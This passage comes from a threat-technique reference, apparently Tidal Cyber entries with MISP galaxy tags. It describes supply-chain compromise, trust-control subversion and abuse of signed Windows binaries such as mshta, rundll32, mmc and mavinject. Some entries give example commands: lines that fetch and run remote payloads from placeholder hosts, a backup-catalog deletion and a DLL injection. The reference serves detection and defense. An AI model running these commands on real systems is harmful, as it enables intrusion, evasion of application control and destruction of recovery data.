  • Note: The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://app.tidalcyber.com/technique/69cd62f8-b729-4a05-8351-5bb961f7c6d6).

Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. <sup>[[SpectorOps Subverting Trust Sept 2017](https://app.tidalcyber.com/references/0b6e7651-0e17-4101-ab2b-22cb09fe1691)]</sup>

The tag is: misp-galaxy:technique="SIP and Trust Provider Hijacking"

Subvert Trust Controls

Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.

Adversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://app.tidalcyber.com/technique/cb2e4822-2529-4216-b5b8-75158c5f85ff) or [Modify Registry](https://app.tidalcyber.com/technique/0dfeab84-3c42-4b56-9021-70fe5be4092b) in support of subverting these controls.<sup>[[SpectorOps Subverting Trust Sept 2017](https://app.tidalcyber.com/references/0b6e7651-0e17-4101-ab2b-22cb09fe1691)]</sup> Adversaries may also create or steal code signing certificates to acquire trust on target systems.<sup>[[Securelist Digital Certificates](https://app.tidalcyber.com/references/3568163b-24b8-42fd-b111-b9d83c34cc4f)]</sup><sup>[[Symantec Digital Certificates](https://app.tidalcyber.com/references/4b4f0171-827d-45c3-8c89-66ea801e77e8)]</sup>

The tag is: misp-galaxy:technique="Subvert Trust Controls"

Compromise Hardware Supply Chain

Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.

The tag is: misp-galaxy:technique="Compromise Hardware Supply Chain"

Compromise Software Dependencies and Development Tools

Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.<sup>[[Trendmicro NPM Compromise](https://app.tidalcyber.com/references/69eac1b0-1c50-4534-99e0-2d0fd738ab8f)]</sup>

Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.

The tag is: misp-galaxy:technique="Compromise Software Dependencies and Development Tools"

Compromise Software Supply Chain

Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.

Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.<sup>[[Avast CCleaner3 2018](https://app.tidalcyber.com/references/1641553f-96e7-4829-8c77-d96388dac5c7)]</sup><sup>[[Command Five SK 2011](https://app.tidalcyber.com/references/ccca927e-fa03-4eba-b631-9989804a1f3c)]</sup>

The tag is: misp-galaxy:technique="Compromise Software Supply Chain"

Supply Chain Compromise

Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.

Supply chain compromise can take place at any stage of the supply chain including:

While supply chain compromise can impact any component of hardware or software, adversaries looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels.<sup>[[Avast CCleaner3 2018](https://app.tidalcyber.com/references/1641553f-96e7-4829-8c77-d96388dac5c7)]</sup><sup>[[Microsoft Dofoil 2018](https://app.tidalcyber.com/references/85069317-2c25-448b-9ff4-504e429dc1bf)]</sup><sup>[[Command Five SK 2011](https://app.tidalcyber.com/references/ccca927e-fa03-4eba-b631-9989804a1f3c)]</sup> Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.<sup>[[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)]</sup><sup>[[Avast CCleaner3 2018](https://app.tidalcyber.com/references/1641553f-96e7-4829-8c77-d96388dac5c7)]</sup><sup>[[Command Five SK 2011](https://app.tidalcyber.com/references/ccca927e-fa03-4eba-b631-9989804a1f3c)]</sup> Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency.<sup>[[Trendmicro NPM Compromise](https://app.tidalcyber.com/references/69eac1b0-1c50-4534-99e0-2d0fd738ab8f)]</sup>

The tag is: misp-galaxy:technique="Supply Chain Compromise"

CMSTP

Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. <sup>[[Microsoft Connection Manager Oct 2009](https://app.tidalcyber.com/references/0b0880a8-82cc-4e23-afd9-95d099c753a4)]</sup> CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.

Adversaries may supply CMSTP.exe with INF files infected with malicious commands. <sup>[[Twitter CMSTP Usage Jan 2018](https://app.tidalcyber.com/references/836621f3-83e1-4c55-8e3b-740fc9ba1e46)]</sup> Similar to [Regsvr32](https://app.tidalcyber.com/technique/b1da2b02-9ade-45e0-a795-ec1b19e5316a) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs <sup>[[MSitPros CMSTP Aug 2017](https://app.tidalcyber.com/references/8dbbf13b-e73c-43c2-a053-7b07fdf25c85)]</sup> and/or COM scriptlets (SCT) from remote servers. <sup>[[Twitter CMSTP Jan 2018](https://app.tidalcyber.com/references/3847149c-1463-4d94-be19-0a8cf1db0b58)]</sup> <sup>[[GitHub Ultimate AppLocker Bypass List](https://app.tidalcyber.com/references/a2fa7fb8-ddba-44cf-878f-448fb2aa6149)]</sup> <sup>[[Endurant CMSTP July 2018](https://app.tidalcyber.com/references/d67901a4-8774-42d3-98de-c20158f88eb6)]</sup> This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft.

CMSTP.exe can also be abused to [Bypass User Account Control](https://app.tidalcyber.com/technique/5e1499a1-f1ad-4929-84e1-5d33c371c02d) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. <sup>[[MSitPros CMSTP Aug 2017](https://app.tidalcyber.com/references/8dbbf13b-e73c-43c2-a053-7b07fdf25c85)]</sup> <sup>[[GitHub Ultimate AppLocker Bypass List](https://app.tidalcyber.com/references/a2fa7fb8-ddba-44cf-878f-448fb2aa6149)]</sup> <sup>[[Endurant CMSTP July 2018](https://app.tidalcyber.com/references/d67901a4-8774-42d3-98de-c20158f88eb6)]</sup>

The tag is: misp-galaxy:technique="CMSTP"

Compiled HTML File

Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. <sup>[[Microsoft HTML Help May 2018](https://app.tidalcyber.com/references/f9daf15d-61ea-4cfa-a4e8-9d33d1acd28f)]</sup> CHM content is displayed using underlying components of the Internet Explorer browser <sup>[[Microsoft HTML Help ActiveX](https://app.tidalcyber.com/references/ae5728bd-571a-451f-9ba3-3198067135b4)]</sup> loaded by the HTML Help executable program (hh.exe). <sup>[[Microsoft HTML Help Executable Program](https://app.tidalcyber.com/references/1af226cc-bb93-43c8-972e-367482c5d487)]</sup>

A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. <sup>[[MsitPros CHM Aug 2017](https://app.tidalcyber.com/references/d4e4cc8a-3246-463f-ba06-d68459d907d4)]</sup> <sup>[[Microsoft CVE-2017-8625 Aug 2017](https://app.tidalcyber.com/references/402cb526-ef57-4d27-b96b-f98008abe716)]</sup>

The tag is: misp-galaxy:technique="Compiled HTML File"

Control Panel

Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.

Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a <code>CPlApplet</code> function.<sup>[[Microsoft Implementing CPL](https://app.tidalcyber.com/references/63c5c654-e885-4427-a644-068f4057f35f)]</sup><sup>[[TrendMicro CPL Malware Jan 2014](https://app.tidalcyber.com/references/9549f9b6-b771-4500-bd82-426c7abdfd8f)]</sup> For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.<sup>[[Microsoft Implementing CPL](https://app.tidalcyber.com/references/63c5c654-e885-4427-a644-068f4057f35f)]</sup> Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.<sup>[[Microsoft Implementing CPL](https://app.tidalcyber.com/references/63c5c654-e885-4427-a644-068f4057f35f)]</sup> <sup>[[TrendMicro CPL Malware Jan 2014](https://app.tidalcyber.com/references/9549f9b6-b771-4500-bd82-426c7abdfd8f)]</sup><sup>[[TrendMicro CPL Malware Dec 2013](https://app.tidalcyber.com/references/fd38f1fd-37e9-4173-b319-3f92c2743055)]</sup>

Malicious Control Panel items can be delivered via [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) campaigns<sup>[[TrendMicro CPL Malware Jan 2014](https://app.tidalcyber.com/references/9549f9b6-b771-4500-bd82-426c7abdfd8f)]</sup><sup>[[TrendMicro CPL Malware Dec 2013](https://app.tidalcyber.com/references/fd38f1fd-37e9-4173-b319-3f92c2743055)]</sup> or executed as part of multi-stage malware.<sup>[[Palo Alto Reaver Nov 2017](https://app.tidalcyber.com/references/69fbe527-2ec4-457b-81b1-2eda65eb8442)]</sup> Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.

Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to <code>HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls</code>. Even when these registered DLLs do not comply with the CPL file specification and do not export <code>CPlApplet</code> functions, they are loaded and executed through its <code>DllEntryPoint</code> when Control Panel is executed. CPL files not exporting <code>CPlApplet</code> are not directly executable.<sup>[[ESET InvisiMole June 2020](https://app.tidalcyber.com/references/d10cfda8-8fd8-4ada-8c61-dba6065b0bac)]</sup>

The tag is: misp-galaxy:technique="Control Panel"

InstallUtil

Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. <sup>[[MSDN InstallUtil](https://app.tidalcyber.com/references/54d962fc-4ca6-4f5f-b383-ec87d711a764)]</sup> The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>.

InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute <code>[System.ComponentModel.RunInstaller(true)]</code>. <sup>[[LOLBAS Installutil](https://app.tidalcyber.com/references/7dfb2c45-862a-4c25-a65a-55abea4b0e44)]</sup>

The tag is: misp-galaxy:technique="InstallUtil"

Mavinject

Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).<sup>[[LOLBAS Mavinject](https://app.tidalcyber.com/references/4ba7fa89-006b-4fbf-aa6c-6775842c97a4)]</sup>

Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://app.tidalcyber.com/technique/232bb95b-a267-4cc2-8eb1-67ecdd5babd5)), allowing for arbitrary code execution (ex. <code>C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL</code>).<sup>[[ATT Lazarus TTP Evolution](https://app.tidalcyber.com/references/594c59ff-c4cb-4164-a62d-120e282b2538)]</sup><sup>[[Reaqta Mavinject](https://app.tidalcyber.com/references/5c0e0c84-2992-4098-8913-66a20ca61bf4)]</sup> Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process.

In addition to [Dynamic-link Library Injection](https://app.tidalcyber.com/technique/232bb95b-a267-4cc2-8eb1-67ecdd5babd5), Mavinject.exe can also be abused to perform import descriptor injection via its <code>/HMODULE</code> command-line parameter (ex. <code>mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER</code>). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.<sup>[[Mavinject Functionality Deconstructed](https://app.tidalcyber.com/references/17b055ba-5e59-4508-ba77-2519c03c6d65)]</sup>

The tag is: misp-galaxy:technique="Mavinject"

MMC

Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt.<sup>[[win_mmc](https://app.tidalcyber.com/references/508373ef-2634-404f-99de-7a73cce68699)]</sup><sup>[[what_is_mmc](https://app.tidalcyber.com/references/57e130ab-f981-423e-bafe-51d0d0e1abdf)]</sup> MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.<sup>[[win_msc_files_overview](https://app.tidalcyber.com/references/81aa896a-3498-4c37-8882-2b77933b71a8)]</sup>

For example, <code>mmc C:\Users\foo\admintools.msc /a</code> will open a custom, saved console msc file in author mode.<sup>[[win_mmc](https://app.tidalcyber.com/references/508373ef-2634-404f-99de-7a73cce68699)]</sup> Another common example is <code>mmc gpedit.msc</code>, which will open the Group Policy Editor application window.

Adversaries may use MMC commands to perform malicious tasks. For example, <code>mmc wbadmin.msc delete catalog -quiet</code> deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://app.tidalcyber.com/technique/d207c03b-fbe7-420e-a053-339f4650c043)) without prompts to the user (Note: <code>wbadmin.msc</code> may only be present by default on Windows Server operating systems).<sup>[[win_wbadmin_delete_catalog](https://app.tidalcyber.com/references/6adfba35-3bf1-4915-813e-40c4a843ae34)]</sup><sup>[[phobos_virustotal](https://app.tidalcyber.com/references/929dbb22-34a5-4377-95dd-9e240ecb343a)]</sup>

Adversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) class object.<sup>[[win_clsid_key](https://app.tidalcyber.com/references/239bb629-2733-4da3-87c2-47a7ab55433f)]</sup> Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.<sup>[[mmc_vulns](https://app.tidalcyber.com/references/7bcf1c90-6299-448b-92c3-a6702882936a)]</sup> Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: <code>mmc.exe -Embedding C:\path\to\test.msc</code>.<sup>[[abusing_com_reg](https://app.tidalcyber.com/references/7f0f223f-09b1-4f8f-b6f1-1044e2ac7066)]</sup>

The tag is: misp-galaxy:technique="MMC"

Mshta

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code <sup>[[Cylance Dust Storm](https://app.tidalcyber.com/references/001dd53c-74e6-4add-aeb7-da76b0d2afe8)]</sup> <sup>[[Red Canary HTA Abuse Part Deux](https://app.tidalcyber.com/references/39b1cb2f-a07b-49f2-bf2c-15f0c9b95772)]</sup> <sup>[[FireEye Attacks Leveraging HTA](https://app.tidalcyber.com/references/1876a476-b2ff-4605-a78b-89443d21b063)]</sup> <sup>[[Airbus Security Kovter Analysis](https://app.tidalcyber.com/references/a8420828-9e00-45a1-90d7-a37f898204f9)]</sup> <sup>[[FireEye FIN7 April 2017](https://app.tidalcyber.com/references/6ee27fdb-1753-4fdf-af72-3295b072ff10)]</sup>

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. <sup>[[Wikipedia HTML Application](https://app.tidalcyber.com/references/f1f76055-91f8-4977-9392-bed347e4f181)]</sup> HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. <sup>[[MSDN HTML Applications](https://app.tidalcyber.com/references/2de103a8-8d72-40f9-b366-b908364dd090)]</sup>

Files may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))</code>

They may also be executed directly from URLs: <code>mshta http[:]//webserver/payload[.]hta</code>

Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer’s security context, it also bypasses browser security settings. <sup>[[LOLBAS Mshta](https://app.tidalcyber.com/references/915a4aef-800e-4c68-ad39-df67c3dbaf75)]</sup>

The tag is: misp-galaxy:technique="Mshta"

Msiexec

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).<sup>[[Microsoft msiexec](https://app.tidalcyber.com/references/028a8dc6-08f6-4660-8b82-9d5483d15f72)]</sup> The Msiexec.exe binary may also be digitally signed by Microsoft.

Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.<sup>[[LOLBAS Msiexec](https://app.tidalcyber.com/references/996cc7ea-0729-4c51-b9c3-b201ec32e984)]</sup><sup>[[TrendMicro Msiexec Feb 2018](https://app.tidalcyber.com/references/768c99f3-ee28-47dc-bc33-06d50ac72dea)]</sup> Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the <code>AlwaysInstallElevated</code> policy is enabled.<sup>[[Microsoft AlwaysInstallElevated 2018](https://app.tidalcyber.com/references/19026f4c-ad65-435e-8c0e-a8ccc9895348)]</sup>

The tag is: misp-galaxy:technique="Msiexec"

Odbcconf

Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.<sup>[[Microsoft odbcconf.exe](https://app.tidalcyber.com/references/9df74876-2abf-4ced-b986-36212225d795)]</sup> The Odbcconf.exe binary may be digitally signed by Microsoft.

Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://app.tidalcyber.com/technique/b1da2b02-9ade-45e0-a795-ec1b19e5316a), odbcconf.exe has a <code>REGSVR</code> flag that can be misused to execute DLLs (ex: <code>odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}</code>). <sup>[[LOLBAS Odbcconf](https://app.tidalcyber.com/references/febcaaec-b535-4347-a4c7-b3284b251897)]</sup><sup>[[TrendMicro Squiblydoo Aug 2017](https://app.tidalcyber.com/references/efeb475c-2a7c-4ab6-814d-3ee7866fa322)]</sup><sup>[[TrendMicro Cobalt Group Nov 2017](https://app.tidalcyber.com/references/81847e06-fea0-4d90-8a9e-5bc99a2bf3f0)]</sup>

The tag is: misp-galaxy:technique="Odbcconf"

Regsvcs/Regasm

Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. <sup>[[MSDN Regsvcs](https://app.tidalcyber.com/references/4f3651df-159e-4006-8cb6-de0d0712a194)]</sup> <sup>[[MSDN Regasm](https://app.tidalcyber.com/references/66a3de54-4a16-4b1b-b18f-e3842aeb7b40)]</sup>

Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: <code>[ComRegisterFunction]</code> or <code>[ComUnregisterFunction]</code> respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. <sup>[[LOLBAS Regsvcs](https://app.tidalcyber.com/references/3f669f4c-0b94-4b78-ad3e-fd62f7600902)]</sup><sup>[[LOLBAS Regasm](https://app.tidalcyber.com/references/b6a3356f-72c2-4ec2-a276-2432eb691055)]</sup>

The tag is: misp-galaxy:technique="Regsvcs/Regasm"

Regsvr32

Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. <sup>[[Microsoft Regsvr32](https://app.tidalcyber.com/references/723ec577-5ea8-4ced-b6c3-b7aaabe1d7e8)]</sup>

Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. <sup>[[LOLBAS Regsvr32](https://app.tidalcyber.com/references/8e32abef-534e-475a-baad-946b6ec681c1)]</sup> This variation of the technique is often referred to as a "Squiblydoo" and has been used in campaigns targeting governments. <sup>[[Carbon Black Squiblydoo Apr 2016](https://app.tidalcyber.com/references/b23fc191-cc84-49c8-9eb0-09db7e23b24d)]</sup> <sup>[[FireEye Regsvr32 Targeting Mongolian Gov](https://app.tidalcyber.com/references/d1509d15-04af-46bd-a6b1-30fbd179b257)]</sup>

Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://app.tidalcyber.com/technique/3e1ef5ba-6426-4fe0-ad48-78557667d680). <sup>[[Carbon Black Squiblydoo Apr 2016](https://app.tidalcyber.com/references/b23fc191-cc84-49c8-9eb0-09db7e23b24d)]</sup>

The tag is: misp-galaxy:technique="Regsvr32"

Rundll32

Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://app.tidalcyber.com/technique/8941d1f4-d80c-4aaa-821a-a059c2a0f854)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>).

Rundll32.exe can also be used to execute [Control Panel](https://app.tidalcyber.com/technique/b5cc9ab3-6501-4c50-904e-1a25a4088125) Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. <sup>[[Trend Micro CPL](https://app.tidalcyber.com/references/d90a33aa-8f20-49cb-aa27-771249cb65eb)]</sup>

Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code> This behavior has been seen used by malware such as Poweliks. <sup>[[This is Security Command Line Confusion](https://app.tidalcyber.com/references/49a21bba-b77d-4b0e-b666-20ef2826e92c)]</sup>

Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command <code>rundll32.exe ExampleDLL.dll, ExampleFunction</code>, rundll32.exe would first attempt to execute <code>ExampleFunctionW</code>, or failing that <code>ExampleFunctionA</code>, before loading <code>ExampleFunction</code>). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending <code>W</code> and/or <code>A</code> to harmless ones.<sup>[[Attackify Rundll32.exe Obscurity](https://app.tidalcyber.com/references/daa35853-eb46-4ef4-b543-a2c5157f96bf)]</sup><sup>[[Github NoRunDll](https://app.tidalcyber.com/references/72d4b682-ed19-4e0f-aeff-faa52b3a0439)]</sup> DLL functions can also be exported and executed by an ordinal number (ex: <code>rundll32.exe file.dll,#1</code>).

Additionally, adversaries may use [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.<sup>[[rundll32.exe defense evasion](https://app.tidalcyber.com/references/0f31f0ff-9ddb-4ea9-88d0-7b3b688764af)]</sup>

The tag is: misp-galaxy:technique="Rundll32"

Verclsid

Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.<sup>[[WinOSBite verclsid.exe](https://app.tidalcyber.com/references/5d5fa25b-64a9-4fdb-87c5-1a69a7d2f874)]</sup>

Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running <code>verclsid.exe /S /C {CLSID}</code>, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://app.tidalcyber.com/technique/b1da2b02-9ade-45e0-a795-ec1b19e5316a)). Since the binary may be signed and/or native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.<sup>[[LOLBAS Verclsid](https://app.tidalcyber.com/references/63ac9e95-aad8-4735-9e63-f45d8c499030)]</sup><sup>[[Red Canary Verclsid.exe](https://app.tidalcyber.com/references/f64e934f-737d-4461-8158-ae855bc472c4)]</sup><sup>[[BOHOPS Abusing the COM Registry](https://app.tidalcyber.com/references/3b5c0e62-7ac9-42e1-b2dd-8f2e0739b9d7)]</sup><sup>[[Nick Tyrer GitHub](https://app.tidalcyber.com/references/f4f89926-71eb-4130-a644-8240d2bab721)]</sup>

The tag is: misp-galaxy:technique="Verclsid"

System Binary Proxy Execution

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.<sup>[[LOLBAS Project](https://app.tidalcyber.com/references/14b1d3ab-8508-4946-9913-17e667956064)]</sup> Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.

Similarly, on Linux systems adversaries may abuse trusted binaries such as <code>split</code> to proxy execution of malicious commands.<sup>[[split man page](https://app.tidalcyber.com/references/3a4dc770-8bfa-44e9-bb0e-f0af0ae92994)]</sup><sup>[[GTFO split](https://app.tidalcyber.com/references/4b86c8c3-57b0-4558-be21-f928acb23f49)]</sup>

The tag is: misp-galaxy:technique="System Binary Proxy Execution"

System Information Discovery

An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://app.tidalcyber.com/technique/a2961a00-450e-45a5-b293-f699d9f3b4ea) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Tools such as [Systeminfo](https://app.tidalcyber.com/software/cecea681-a753-47b5-9d77-c10a5b4403ab) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the <code>systemsetup</code> configuration tool on macOS. As an example, adversaries with user-level access can execute the <code>df -aH</code> command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to gather detailed system information (e.g. <code>show version</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup> [System Information Discovery](https://app.tidalcyber.com/technique/a2961a00-450e-45a5-b293-f699d9f3b4ea) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.<sup>[[OSX.FairyTale](https://app.tidalcyber.com/references/27f8ad45-53d2-48ba-b549-f7674cf9c2e7)]</sup><sup>[[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)]</sup>

Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.<sup>[[Amazon Describe Instance](https://app.tidalcyber.com/references/c0b6a8a4-0d94-414d-b5ab-cf5485240dee)]</sup><sup>[[Google Instances Resource](https://app.tidalcyber.com/references/9733447c-072f-4da8-9cc7-0a0ce6a3b820)]</sup><sup>[[Microsoft Virutal Machine API](https://app.tidalcyber.com/references/f565c237-07c5-4e9e-9879-513627517109)]</sup>

The tag is: misp-galaxy:technique="System Information Discovery"

System Language Discovery

Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.<sup>[[Malware System Language Check](https://app.tidalcyber.com/references/3d4c5366-038a-453e-b803-a172b95da5f7)]</sup>

There are various sources of data an adversary could use to infer system language, such as system defaults and keyboard layouts. Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Query Registry](https://app.tidalcyber.com/technique/58722f84-b119-45a8-8e29-0065688015ee) and calls to [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) functions.<sup>[[CrowdStrike Ryuk January 2019](https://app.tidalcyber.com/references/df471757-2ce0-48a7-922f-a84c57704914)]</sup>

